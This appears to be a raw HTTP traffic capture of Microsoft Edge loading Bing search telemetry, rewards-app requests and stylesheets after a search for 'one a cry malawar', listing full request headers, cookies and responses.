GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1730%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199025539%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.14910d26
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1730%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199025539%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1730%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199025539%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000

Response

HTTP/2.0 200

content-length: 839
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, must-revalidate
content-encoding: gzip
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67117bb292594408985f0d0f11db0a56
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-J5KT1vjvV20LCLh7AOPTFz9aEUT6Uk+/ZpLSeig/VLE='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67117bb292594408985f0d0f11db0a56|AFD:67117bb292594408985f0d0f11db0a56|2024-10-17T21:03:46.227Z
date: Thu, 17 Oct 2024 21:03:46 GMT
set-cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.14910d64
POST

https://www.bing.com/rewardsapp/ncheader?ver=50509585&IID=SERP.5056&IG=125258D7D1334F6085405077EDD48B89

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /rewardsapp/ncheader?ver=50509585&IID=SERP.5056&IG=125258D7D1334F6085405077EDD48B89 HTTP/2.0
host: www.bing.com
content-length: 4
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:38:10 GMT
etag: 0x8DCDC637565AD96
content-length: 301
content-type: text/css
content-encoding: gzip
content-md5: HJS5PMy7uv8AUjv1kxMX/A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f2803287-b01e-002a-5fff-169fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=383740
expires: Tue, 22 Oct 2024 07:39:26 GMT
date: Thu, 17 Oct 2024 21:03:46 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c2777b5c.1729199026.14910dd5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
POST

https://www.bing.com/rewardsapp/reportActivity?IG=125258D7D1334F6085405077EDD48B89&IID=SERP.5065&q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /rewardsapp/reportActivity?IG=125258D7D1334F6085405077EDD48B89&IID=SERP.5065&q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
content-length: 162
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:46:44 GMT
etag: 0x8DCDC64A792B513
content-length: 389
content-type: text/css
content-encoding: gzip
content-md5: 3/vZUXOW4wNHGLr6SU0xpQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 552416c1-d01e-0013-43ba-15df71000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=59036
expires: Fri, 18 Oct 2024 13:27:42 GMT
date: Thu, 17 Oct 2024 21:03:46 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c2777b5c.1729199026.14910dd4
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/g2mFaePdYzQOubI8JEItbebrED8.gz.css

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rp/g2mFaePdYzQOubI8JEItbebrED8.gz.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:07:13 GMT
etag: 0x8DCDC67841F50BE
content-length: 1341
content-type: text/css
content-encoding: gzip
content-md5: WX/sslb8tPUCRYKUX1pQ4A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 21de22e8-c01e-0025-28da-147223000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=342198
expires: Mon, 21 Oct 2024 20:07:04 GMT
date: Thu, 17 Oct 2024 21:03:46 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c2777b5c.1729199026.14910de4
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/_ykiGO1K5rjAQeICdJheT3jfLeY.gz.css

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rp/_ykiGO1K5rjAQeICdJheT3jfLeY.gz.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:34:21 GMT
etag: 0x8DCDC62ECDE4B01
content-length: 375
content-type: text/css; charset=utf-8
content-encoding: gzip
content-md5: 5S1KJFL4/jq12fkMTKSaRg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e4ee8097-201e-000d-7aa1-14059c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=47761
expires: Fri, 18 Oct 2024 10:19:47 GMT
date: Thu, 17 Oct 2024 21:03:46 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c2777b5c.1729199026.14910de3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Yb-MiHwFpZo4XYbuuNLKCnyhd1M.gz.css

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rp/Yb-MiHwFpZo4XYbuuNLKCnyhd1M.gz.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1

Response

HTTP/2.0 200

content-length: 1034
content-type: text/html; charset=utf-8
cache-control: no-cache
content-encoding: gzip
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67117bb21b8543d8832f41c70e1d7a9a
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ee6NTAmOd/zg27H2ZNJRcLvx3CsS7mJaVmZPuj9rTuY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67117bb21b8543d8832f41c70e1d7a9a|AFD:67117bb21b8543d8832f41c70e1d7a9a|2024-10-17T21:03:46.275Z
date: Thu, 17 Oct 2024 21:03:46 GMT
set-cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Fri, 17-Oct-2025 21:03:46 GMT; path=/; secure; SameSite=None
set-cookie: _Rwho=u=d&ts=2024-10-17; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.14910d79
GET

https://r.bing.com/rp/tPLNa5UcMaQEzzg0acZfPM45N6I.gz.css

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rp/tPLNa5UcMaQEzzg0acZfPM45N6I.gz.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
